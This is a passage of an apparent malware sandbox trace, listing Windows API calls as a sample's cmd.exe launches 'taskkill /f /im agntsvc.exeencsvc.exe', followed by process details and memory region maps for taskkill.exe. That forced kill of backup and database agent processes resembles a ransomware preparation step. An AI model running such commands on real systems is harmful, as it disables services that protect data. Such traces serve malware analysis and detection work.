_String2="RD") returned 2 [0177.486] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0177.486] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0177.486] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0177.486] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0177.486] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0177.486] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0177.486] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0177.486] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0177.486] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0177.486] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0177.487] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0177.487] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0177.487] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0177.487] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0177.487] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0177.487] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0177.487] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0177.487] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0177.487] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0177.487] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0177.487] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0177.487] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0177.487] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0177.487] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0177.487] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0177.487] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0177.487] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0177.488] GetProcessHeap () returned 0x5a0000 [0177.488] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x210) returned 0x5aad58 [0177.488] GetProcessHeap () returned 0x5a0000 [0177.488] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x58) returned 0x5aaf70 [0177.488] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0177.488] GetProcessHeap () returned 0x5a0000 [0177.489] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x418) returned 0x5a05c8 [0177.489] SetErrorMode (uMode=0x0) returned 0x8003 [0177.489] SetErrorMode (uMode=0x1) returned 0x0 [0177.489] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0177.489] SetErrorMode (uMode=0x8003) returned 0x1 [0177.489] GetProcessHeap () returned 0x5a0000 [0177.489] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a05c8, Size=0x56) returned 0x5a05c8 [0177.489] GetProcessHeap () returned 0x5a0000 [0177.489] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a05c8) returned 0x56 [0177.489] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0177.489] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.489] GetProcessHeap () returned 0x5a0000 [0177.489] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x110) returned 0x5aafd0 [0177.490] GetProcessHeap () returned 0x5a0000 [0177.490] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x218) returned 0x5a0628 [0177.500] GetProcessHeap () returned 0x5a0000 [0177.500] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a0628, Size=0x112) returned 0x5a0628 [0177.500] GetProcessHeap () returned 0x5a0000 [0177.500] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a0628) returned 0x112 [0177.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0177.500] GetProcessHeap () returned 0x5a0000 [0177.500] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe0) returned 0x5ab0e8 [0177.503] GetProcessHeap () returned 0x5a0000 [0177.503] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5ab0e8, Size=0x76) returned 0x5ab0e8 [0177.503] GetProcessHeap () returned 0x5a0000 [0177.503] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5ab0e8) returned 0x76 [0177.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.503] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0177.503] GetLastError () returned 0x2 [0177.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5ab168 [0177.504] GetProcessHeap () returned 0x5a0000 [0177.504] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5a7780 [0177.504] FindClose (in: hFindFile=0x5ab168 | out: hFindFile=0x5ab168) returned 1 [0177.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0177.504] GetLastError () returned 0x2 [0177.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5ab168 [0177.504] GetProcessHeap () returned 0x5a0000 [0177.504] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a7780, Size=0x4) returned 0x5ab1a8 [0177.504] FindClose (in: hFindFile=0x5ab168 | out: hFindFile=0x5ab168) returned 1 [0177.505] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.505] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.505] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0177.505] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0177.505] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0177.505] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144)) [0177.505] GetProcessHeap () returned 0x5a0000 [0177.505] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a7620 [0177.505] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0177.505] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0177.505] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0177.505] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0177.506] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.507] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.508] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.508] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.508] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.508] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0177.508] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0177.508] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0177.508] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0177.509] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0177.509] GetProcessHeap () returned 0x5a0000 [0177.509] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5a7620) returned 1 [0177.509] GetProcessHeap () returned 0x5a0000 [0177.510] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa) returned 0x5ab1b8 [0177.510] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.516] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im agntsvc.exeencsvc.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im agntsvc.exeencsvc.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im agntsvc.exeencsvc.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xdc0, dwThreadId=0x8c8)) returned 1 [0177.538] CloseHandle (hObject=0x98) returned 1 [0177.538] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.538] GetProcessHeap () returned 0x5a0000 [0177.538] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5a9d68) returned 1 [0177.539] GetEnvironmentStringsW () returned 0x5a9d68* [0177.539] GetProcessHeap () returned 0x5a0000 [0177.540] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa76) returned 0x5a7cd8 [0177.540] FreeEnvironmentStringsA (penv="=") returned 1 [0177.540] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0179.734] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0179.735] CloseHandle (hObject=0x9c) returned 1 [0179.736] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0179.736] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0179.737] GetProcessHeap () returned 0x5a0000 [0179.737] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5a7cd8) returned 1 [0179.738] GetEnvironmentStringsW () returned 0x5a7cd8* [0179.738] GetProcessHeap () returned 0x5a0000 [0179.738] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa9c) returned 0x5ac710 [0179.738] FreeEnvironmentStringsA (penv="=") returned 1 [0179.738] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0179.738] GetProcessHeap () returned 0x5a0000 [0179.738] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5ac710) returned 1 [0179.739] GetEnvironmentStringsW () returned 0x5a7cd8* [0179.739] GetProcessHeap () returned 0x5a0000 [0179.739] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa9c) returned 0x5ac710 [0179.740] FreeEnvironmentStringsA (penv="=") returned 1 [0179.740] GetProcessHeap () returned 0x5a0000 [0179.740] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5ab1b8) returned 1 [0179.740] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0179.740] _get_osfhandle (_FileHandle=1) returned 0x140 [0179.740] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0179.740] _get_osfhandle (_FileHandle=1) returned 0x140 [0179.740] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0179.740] _get_osfhandle (_FileHandle=0) returned 0x13c [0179.740] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0179.740] GetConsoleOutputCP () returned 0x1b5 [0179.863] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0179.863] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.870] exit (_Code=128) Thread: id = 227 os_tid = 0x658 Process: id = "39" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x5808d000" os_pid = "0xdc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x188" cmd_line = "taskkill /f /im agntsvc.exeencsvc.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3026 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3027 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3028 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3029 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3030 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3031 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3032 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3033 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3034 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3035 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3036 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3037 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3038 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3039 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3040 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3041 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3042 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3043 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3044 start_va = 0x45a0000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3045 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3046 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3047 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3048 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3049 start_va = 0x45b0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 3050 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3051 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3052 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3053 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3054 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3055 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3056 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3057 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3058 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3059 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 3060 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3061 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3062 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3063 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3064 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3065 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3066 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3067 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3068 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3069 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3070 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3071 start_va = 0x6cd90000 end_va = 0x6cda5fff monitored = 0 entry_point = 0x6cd921d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3072 start_va = 0x6cd50000 end_va = 0x6cd8efff monitored = 0 entry_point = 0x6cd646c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3073 start_va = 0x6cbb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6cbdd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3074 start_va = 0x6cb90000 end_va = 0x6cbabfff monitored = 0 entry_point = 0x6cb94720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3075 start_va = 0x6cad0000 end_va = 0x6cad9fff monitored = 0 entry_point = 0x6cad28d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3076 start_va = 0x6cac0000 end_va = 0x6cac7fff monitored = 0 entry_point = 0x6cac17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3077 start_va = 0x4480000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 3078 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3079 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 3080 start_va = 0x47f0000 end_va = 0x4977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047f0000" filename = "" Region: id = 3081 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3082 start_va = 0x4980000 end_va = 0x4b00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004980000" filename = "" Region: id = 3083 start_va = 0x4b10000 end_va = 